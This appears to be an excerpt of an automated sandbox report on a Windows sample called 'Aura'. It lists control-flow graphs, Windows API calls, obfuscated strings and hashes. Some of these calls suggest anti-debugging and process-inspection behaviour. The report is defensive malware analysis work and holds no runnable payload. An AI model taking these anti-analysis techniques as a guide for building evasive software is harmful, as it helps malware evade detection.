                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID: NtQueryInformationProcess$ntdll.dll$u\|{
                                                • API String ID: 4139908857-3994497579
                                                • Opcode ID: b2ac7141523aa29eeeb9fc5e452d75e4a39dcd0b3ca3363bbd1a2912f5564449
                                                • Instruction ID: 2f6276983e9c2ee449971df5d54b0fedeabb1732bee76f43741658ffa5ba7211
                                                • Opcode Fuzzy Hash: b2ac7141523aa29eeeb9fc5e452d75e4a39dcd0b3ca3363bbd1a2912f5564449
                                                • Instruction Fuzzy Hash: AFE216B6A445018FDF08CFBCC9D53DE7BF2AF46325F155219D462EB7A5C63A890A8B00

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1804 6cdc18a8-6cdc18bb call 6cdc2110 1807 6cdc18bd-6cdc18bf 1804->1807 1808 6cdc18c1-6cdc18e3 call 6cdc1cf0 1804->1808 1809 6cdc192a-6cdc1939 1807->1809 1812 6cdc18e5-6cdc1928 call 6cdc1dbb call 6cdc1c77 call 6cdc20d9 call 6cdc193d call 6cdc1f5c call 6cdc194a 1808->1812 1813 6cdc1950-6cdc1969 call 6cdc1f8a call 6cdc2110 1808->1813 1812->1809 1824 6cdc197a-6cdc1981 1813->1824 1825 6cdc196b-6cdc1971 1813->1825 1828 6cdc198d-6cdc19a1 dllmain_raw 1824->1828 1829 6cdc1983-6cdc1986 1824->1829 1825->1824 1827 6cdc1973-6cdc1975 1825->1827 1831 6cdc1a53-6cdc1a62 1827->1831 1834 6cdc1a4a-6cdc1a51 1828->1834 1835 6cdc19a7-6cdc19b8 dllmain_crt_dispatch 1828->1835 1829->1828 1832 6cdc1988-6cdc198b 1829->1832 1836 6cdc19be-6cdc19d0 call 6cdc0a10 1832->1836 1834->1831 1835->1834 1835->1836 1843 6cdc19f9-6cdc19fb 1836->1843 1844 6cdc19d2-6cdc19d4 1836->1844 1846 6cdc19fd-6cdc1a00 1843->1846 1847 6cdc1a02-6cdc1a13 dllmain_crt_dispatch 1843->1847 1844->1843 1845 6cdc19d6-6cdc19f4 call 6cdc0a10 call 6cdc18a8 dllmain_raw 1844->1845 1845->1843 1846->1834 1846->1847 1847->1834 1849 6cdc1a15-6cdc1a47 dllmain_raw 1847->1849 1849->1834
                                                APIs
                                                • __RTC_Initialize.LIBCMT ref: 6CDC18EF
                                                • ___scrt_uninitialize_crt.LIBCMT ref: 6CDC1909
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: Initialize___scrt_uninitialize_crt
                                                • String ID:
                                                • API String ID: 2442719207-0
                                                • Opcode ID: 81bdcb6c54e075f4d67c2939bb12cdef0a526dd76c857dbb3c392329be2b726a
                                                • Instruction ID: 2b54f7967ab9a4b37ad97c8ccb66fd9d0f4e0325058cccacd3b6805182aba626
                                                • Opcode Fuzzy Hash: 81bdcb6c54e075f4d67c2939bb12cdef0a526dd76c857dbb3c392329be2b726a
                                                • Instruction Fuzzy Hash: 0341A672F05279EEDB108F95C840B9E7ABCEF457A8F114216E815A7B70C734C9069BA2

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1854 6cdc1958-6cdc1969 call 6cdc2110 1857 6cdc197a-6cdc1981 1854->1857 1858 6cdc196b-6cdc1971 1854->1858 1860 6cdc198d-6cdc19a1 dllmain_raw 1857->1860 1861 6cdc1983-6cdc1986 1857->1861 1858->1857 1859 6cdc1973-6cdc1975 1858->1859 1862 6cdc1a53-6cdc1a62 1859->1862 1864 6cdc1a4a-6cdc1a51 1860->1864 1865 6cdc19a7-6cdc19b8 dllmain_crt_dispatch 1860->1865 1861->1860 1863 6cdc1988-6cdc198b 1861->1863 1866 6cdc19be-6cdc19d0 call 6cdc0a10 1863->1866 1864->1862 1865->1864 1865->1866 1869 6cdc19f9-6cdc19fb 1866->1869 1870 6cdc19d2-6cdc19d4 1866->1870 1872 6cdc19fd-6cdc1a00 1869->1872 1873 6cdc1a02-6cdc1a13 dllmain_crt_dispatch 1869->1873 1870->1869 1871 6cdc19d6-6cdc19f4 call 6cdc0a10 call 6cdc18a8 dllmain_raw 1870->1871 1871->1869 1872->1864 1872->1873 1873->1864 1875 6cdc1a15-6cdc1a47 dllmain_raw 1873->1875 1875->1864
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                • String ID:
                                                • API String ID: 3136044242-0
                                                • Opcode ID: a2927cc14d28e318766308e1ba6e630e4977b5c6eba83a1379990f9f9cbd4d0b
                                                • Instruction ID: b17c4c4c8d7c88c5673b4735ba36d86fc1beddd6dd2645deadbc412bbbdfc850
                                                • Opcode Fuzzy Hash: a2927cc14d28e318766308e1ba6e630e4977b5c6eba83a1379990f9f9cbd4d0b
                                                • Instruction Fuzzy Hash: 89216272F01579EEDB218F55C880AAE7A7DEF81A98F114215F825A7B30C730CD028BE1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1880 6cdc17a1-6cdc17b7 call 6cdc2110 call 6cdc1deb 1885 6cdc17bd-6cdc17d5 call 6cdc1cf0 1880->1885 1886 6cdc188e 1880->1886 1890 6cdc17db-6cdc17ec call 6cdc1d4d 1885->1890 1891 6cdc18a0-6cdc18a7 call 6cdc1f8a 1885->1891 1888 6cdc1890-6cdc189f 1886->1888 1896 6cdc17ee-6cdc1807 call 6cdc20ad call 6cdc1c6b call 6cdc1c8f call 6cdc33d1 1890->1896 1897 6cdc183b-6cdc1849 call 6cdc1884 1890->1897 1914 6cdc180c-6cdc1810 1896->1914 1897->1886 1902 6cdc184b-6cdc1855 call 6cdc1f84 1897->1902 1908 6cdc1876-6cdc187f 1902->1908 1909 6cdc1857-6cdc1860 call 6cdc1eab 1902->1909 1908->1888 1909->1908 1915 6cdc1862-6cdc1874 1909->1915 1914->1897 1916 6cdc1812-6cdc1819 call 6cdc1d22 1914->1916 1915->1908 1916->1897 1920 6cdc181b-6cdc1838 call 6cdc338c 1916->1920 1920->1897
                                                APIs
                                                • __RTC_Initialize.LIBCMT ref: 6CDC17EE
                                                  • Part of subcall function 6CDC1C6B: InitializeSListHead.KERNEL32(6CE21788,6CDC17F8,6CDD10D8,00000010,6CDC1789,?,?,?,6CDC19B1,?,00000001,?,?,00000001,?,6CDD1120), ref: 6CDC1C70
                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CDC1858
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                • String ID:
                                                • API String ID: 3231365870-0
                                                • Opcode ID: e066843aad90c52c1c162e83dac1b8183a78961467da5779f3d47281575b6166
                                                • Instruction ID: c00191a6ddcdd83945bbc8785dc8f83842406802d590d92dcad4d7e7b3d72031
                                                • Opcode Fuzzy Hash: e066843aad90c52c1c162e83dac1b8183a78961467da5779f3d47281575b6166
                                                • Instruction Fuzzy Hash: FA21A132B48221AAEB00ABB484447DDB77C9F4626CF24051AE59127FB1CB26C50DD6B7

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1923 6cdc65cd-6cdc65d2 1924 6cdc65d4-6cdc65ec 1923->1924 1925 6cdc65ee-6cdc65f2 1924->1925 1926 6cdc65fa-6cdc6603 1924->1926 1925->1926 1927 6cdc65f4-6cdc65f8 1925->1927 1928 6cdc6615 1926->1928 1929 6cdc6605-6cdc6608 1926->1929 1930 6cdc6673-6cdc6677 1927->1930 1933 6cdc6617-6cdc6624 GetStdHandle 1928->1933 1931 6cdc660a-6cdc660f 1929->1931 1932 6cdc6611-6cdc6613 1929->1932 1930->1924 1934 6cdc667d-6cdc6680 1930->1934 1931->1933 1932->1933 1935 6cdc6626-6cdc6628 1933->1935 1936 6cdc6633 1933->1936 1935->1936 1937 6cdc662a-6cdc6631 GetFileType 1935->1937 1938 6cdc6635-6cdc6637 1936->1938 1937->1938 1939 6cdc6639-6cdc6642 1938->1939 1940 6cdc6655-6cdc6667 1938->1940 1941 6cdc664a-6cdc664d 1939->1941 1942 6cdc6644-6cdc6648 1939->1942 1940->1930 1943 6cdc6669-6cdc666c 1940->1943 1941->1930 1944 6cdc664f-6cdc6653 1941->1944 1942->1930 1943->1930 1944->1930
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 6CDC6619
                                                • GetFileType.KERNELBASE(00000000), ref: 6CDC662B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: FileHandleType
                                                • String ID:
                                                • API String ID: 3000768030-0
                                                • Opcode ID: 351d937b9e50c4b9c39784ade68dccf643569511a3604b5b3a5b3a458f51a55c
                                                • Instruction ID: 20cb01baf15eb080a9a5baecb1a7e4cdffaf87c4df5acef88f28bd0a81000116
                                                • Opcode Fuzzy Hash: 351d937b9e50c4b9c39784ade68dccf643569511a3604b5b3a5b3a458f51a55c
                                                • Instruction Fuzzy Hash: 7111A571748751CAD7204B3E8C8463ABAAC9B47338B34079AD1B6D79F1C674D5838647

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1945 6cdc6e30-6cdc6e3b 1946 6cdc6e3d-6cdc6e42 1945->1946 1947 6cdc6e44-6cdc6e46 1945->1947 1948 6cdc6e4a 1946->1948 1949 6cdc6e4f-6cdc6e52 call 6cdc4b96 1947->1949 1950 6cdc6e48 1947->1950 1948->1949 1952 6cdc6e57-6cdc6e6d call 6cdc4bf3 1949->1952 1950->1948 1955 6cdc6e6f-6cdc6e93 call 6cdc4b96 call 6cdc4bf3 1952->1955 1956 6cdc6e9a-6cdc6e9d 1952->1956 1955->1956 1968 6cdc6e95-6cdc6e99 1955->1968 1958 6cdc6ea2-6cdc6ed5 call 6cdc63c2 1956->1958 1963 6cdc6ed7-6cdc6eda 1958->1963 1964 6cdc6ee0 1958->1964 1963->1964 1966 6cdc6edc-6cdc6ede 1963->1966 1967 6cdc6ee7-6cdc6ef1 1964->1967 1966->1964 1966->1967 1967->1958 1969 6cdc6ef3-6cdc6ef7 1967->1969
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 7be469774f13e7dd9df0588943815cbff2f02e55719a32fe1640dd1b8fb6df20
                                                • Instruction ID: 51868b04563fb5988aa9a1fdd601c4c4b65ec3ef5da3c1d0cfdad539f4196a73
                                                • Opcode Fuzzy Hash: 7be469774f13e7dd9df0588943815cbff2f02e55719a32fe1640dd1b8fb6df20
                                                • Instruction Fuzzy Hash: D8119371B042109BDB209BB9DC01BA932BDAF52778F180717F524DBAE0D7B9DD434252

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1970 6cdc4b96-6cdc4ba1 1971 6cdc4baf-6cdc4bb5 1970->1971 1972 6cdc4ba3-6cdc4bad 1970->1972 1974 6cdc4bce-6cdc4bdf RtlAllocateHeap 1971->1974 1975 6cdc4bb7-6cdc4bb8 1971->1975 1972->1971 1973 6cdc4be3-6cdc4bee call 6cdc4b83 1972->1973 1981 6cdc4bf0-6cdc4bf2 1973->1981 1976 6cdc4bba-6cdc4bc1 call 6cdc75f5 1974->1976 1977 6cdc4be1 1974->1977 1975->1974 1976->1973 1983 6cdc4bc3-6cdc4bcc call 6cdc67b5 1976->1983 1977->1981 1983->1973 1983->1974
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CDC4799,00000001,00000364,00000013,000000FF,?,00000001,6CDC4B88,6CDC4C19,?,?,6CDC3E2C), ref: 6CDC4BD7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: dbd3a01dc939c6b95e5a560b261b116d7cd8314969fd60895af74e23a36c8697
                                                • Instruction ID: 565fd4eedca3e25d3216d76439fbf853b8a14caaedc344e3d185df8722a3870b
                                                • Opcode Fuzzy Hash: dbd3a01dc939c6b95e5a560b261b116d7cd8314969fd60895af74e23a36c8697
                                                • Instruction Fuzzy Hash: 4FF0903574A524A6EB115B2A9800BBB376E9F91664B244211F814A7AA4CA30D90182E3

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2117 38cd90-38cdee 2118 38cdf0-38ce37 2117->2118 2118->2118 2119 38ce39-38ce54 2118->2119 2121 38ce5e-38cea9 2119->2121 2122 38ce56 2119->2122 2124 38d3de-38d403 call 393cf0 2121->2124 2125 38ceaf-38ceeb 2121->2125 2122->2121 2132 38d40d-38d40f 2124->2132 2133 38d405-38d409 2124->2133 2126 38cef0-38cf3f 2125->2126 2126->2126 2128 38cf41-38cf70 2126->2128 2138 38d3cd-38d3da 2128->2138 2139 38cf76-38cf90 2128->2139 2134 38d42f-38d436 2132->2134 2133->2132 2136 38d438-38d43f 2134->2136 2137 38d442-38d48f call 372ab0 2134->2137 2136->2137 2144 38d490-38d49b 2137->2144 2138->2124 2145 38d3c3-38d3c9 2139->2145 2146 38cf96-38cfb8 2139->2146 2144->2144 2147 38d49d-38d4a9 2144->2147 2145->2138 2148 38cfc0-38cfd4 2146->2148 2149 38d4af-38d4bf call 35abe0 2147->2149 2150 38d420-38d429 2147->2150 2148->2148 2151 38cfd6-38d052 2148->2151 2149->2150 2150->2134 2152 38d4c4-38d4cb 2150->2152 2156 38d060-38d090 2151->2156 2156->2156 2157 38d092-38d0b7 2156->2157 2160 38d3ad-38d3bf 2157->2160 2161 38d0bd-38d0df 2157->2161 2160->2145 2164 38d3a3-38d3a9 2161->2164 2165 38d0e5-38d0e8 2161->2165 2164->2160 2165->2164 2167 38d0ee-38d0f3 2165->2167 2167->2164 2168 38d0f9-38d14f 2167->2168 2170 38d150-38d170 2168->2170 2170->2170 2171 38d172-38d191 2170->2171 2173 38d38e-38d39f 2171->2173 2174 38d197-38d1a0 2171->2174 2173->2164 2174->2173 2175 38d1a6-38d1b3 2174->2175 2176 38d1ed 2175->2176 2177 38d1b5-38d1ba 2175->2177 2180 38d1ef-38d213 call 35ab60 2176->2180 2179 38d1cc-38d1d0 2177->2179 2181 38d1c0 2179->2181 2182 38d1d2-38d1db 2179->2182 2189 38d219-38d223 2180->2189 2190 38d32a-38d34a 2180->2190 2185 38d1c1-38d1ca 2181->2185 2186 38d1dd-38d1e0 2182->2186 2187 38d1e2-38d1e6 2182->2187 2185->2179 2185->2180 2186->2185 2187->2185 2191 38d1e8-38d1eb 2187->2191 2189->2190 2192 38d229-38d22f 2189->2192 2193 38d37a-38d387 call 35ab70 2190->2193 2194 38d34c-38d362 2190->2194 2191->2185 2195 38d230-38d23a 2192->2195 2193->2173 2194->2193 2196 38d364-38d371 2194->2196 2198 38d23c-38d241 2195->2198 2199 38d250-38d255 2195->2199 2196->2193 2200 38d373-38d376 2196->2200 2202 38d2d0-38d2d6 2198->2202 2203 38d276-38d284 2199->2203 2204 38d257-38d25a 2199->2204 2200->2193 2208 38d2d8-38d2de 2202->2208 2206 38d2ea-38d2f3 2203->2206 2207 38d286-38d289 2203->2207 2204->2203 2205 38d25c-38d274 2204->2205 2205->2202 2211 38d2f9-38d2fc 2206->2211 2212 38d2f5-38d2f7 2206->2212 2207->2206 2209 38d28b-38d2cf 2207->2209 2208->2190 2210 38d2e0-38d2e2 2208->2210 2209->2202 2210->2195 2215 38d2e8 2210->2215 2213 38d2fe-38d324 2211->2213 2214 38d326-38d328 2211->2214 2212->2208 2213->2202 2214->2202 2215->2190
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 3{5}$6C%E$>O5A$@7QI$\$`c$cGFY$/.-$h~i
                                                • API String ID: 0-1269567263
                                                • Opcode ID: 10c307f406399cff801fe5f52f234a02b5d0f2ae5266a3891d9ad8e35e134f12
                                                • Instruction ID: 38b8b4ff2249272e4c4c9425c3b7ecdc38ce5012cc192626d696d7149fb235a7
                                                • Opcode Fuzzy Hash: 10c307f406399cff801fe5f52f234a02b5d0f2ae5266a3891d9ad8e35e134f12
                                                • Instruction Fuzzy Hash: D4122F72A083018FD720DF65C884B6BFBE1EF85304F158A6CF9959B291D774E906CB92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: +PQB$N2;4$]`dZ$a]T^$lPkS
                                                • API String ID: 0-3070740194
                                                • Opcode ID: f0c52f030130f251b38661184877e5999dff6719358fa2c42ed5c0678cc3675a
                                                • Instruction ID: f05ec40434a381767ef8c4d9ff3f9762d5790ddee5fa39857b91f90e49635d7e
                                                • Opcode Fuzzy Hash: f0c52f030130f251b38661184877e5999dff6719358fa2c42ed5c0678cc3675a
                                                • Instruction Fuzzy Hash: 1171A1B4508B818BE3368F3585907A7BFE2AF53311F188A6CC5FA1B685C3392506CB55
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CDC1F96
                                                • IsDebuggerPresent.KERNEL32 ref: 6CDC2062
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CDC2082
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 6CDC208C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: a5388ad7ae73be26ff2ffb68abc94bce6f411ed9fb6ad6560fa563982b47fca7
                                                • Instruction ID: 72e1764594936e05774a5fe188dfcc40403afd06607b65b63c4b5b45f4ebea56
                                                • Opcode Fuzzy Hash: a5388ad7ae73be26ff2ffb68abc94bce6f411ed9fb6ad6560fa563982b47fca7
                                                • Instruction Fuzzy Hash: 1A315A75E01218DBEF10DF60C9897CDBBB8BF08308F1041AAE509A7250EB705B89DF45
                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CDC4A12
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CDC4A1C
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CDC4A29
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: b7ab6dfb2e7c9d16fd3fee5bfca8d931de7296524c7e516ed527c133b077d4e3
                                                • Instruction ID: 0b9e5bb4c6b56301415193f2530e21abb567b4a4b4bb6bf845edb860954a3683
                                                • Opcode Fuzzy Hash: b7ab6dfb2e7c9d16fd3fee5bfca8d931de7296524c7e516ed527c133b077d4e3
                                                • Instruction Fuzzy Hash: EE31E674E01228EBCB21DF24D8887DDBBB8BF48314F5051DAE41CA72A0EB749B858F55
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?,6CDC3714,?,00000001,?,?), ref: 6CDC3737
                                                • TerminateProcess.KERNEL32(00000000,?,6CDC3714,?,00000001,?,?), ref: 6CDC373E
                                                • ExitProcess.KERNEL32 ref: 6CDC3750
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: dd19cd1a6f54cdb658c02fe50ffb52e3841e113deb400586ed09692c4e9d4927
                                                • Instruction ID: 9bdc3232476eeed6596564926401e788bb34bc50fe81123ee540d8cebee122a5
                                                • Opcode Fuzzy Hash: dd19cd1a6f54cdb658c02fe50ffb52e3841e113deb400586ed09692c4e9d4927
                                                • Instruction Fuzzy Hash: D5E04631200248EBCF017B60C848AC87B3DFB81649B000514FA0887A30CB35EAA2EA92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: )(,*$eXj1
                                                • API String ID: 0-3627572967
                                                • Opcode ID: 9458030c619538aa755a9e70db64145b0786cfb17033e711a65b8ae71f2ec3c3
                                                • Instruction ID: ee4d069b11ec29097f3f7a97fe3b95c56496b30ed8de92a12c1184db3ea44f6e
                                                • Opcode Fuzzy Hash: 9458030c619538aa755a9e70db64145b0786cfb17033e711a65b8ae71f2ec3c3
                                                • Instruction Fuzzy Hash: 79620270604B408FC736CF39C890666BBE2BF55314B198A6DC4EA8BB92D739F506DB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Y#'-$Y#'-
                                                • API String ID: 0-3648800905
                                                • Opcode ID: c3ff56b8655fc0ca677222b4f4859558fe54342f1fd4de26db47698edff5468a
                                                • Instruction ID: c80dc3867eadeb4ba23b85ebb63ef99c0ffcf5de0a6ecb8e14b59642ca24e187
                                                • Opcode Fuzzy Hash: c3ff56b8655fc0ca677222b4f4859558fe54342f1fd4de26db47698edff5468a
                                                • Instruction Fuzzy Hash: 10D1D1B6A441458FCF04CFBCC9953DE7BF2AB4A354F10A216C456FB7A4C23ADA098B54
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
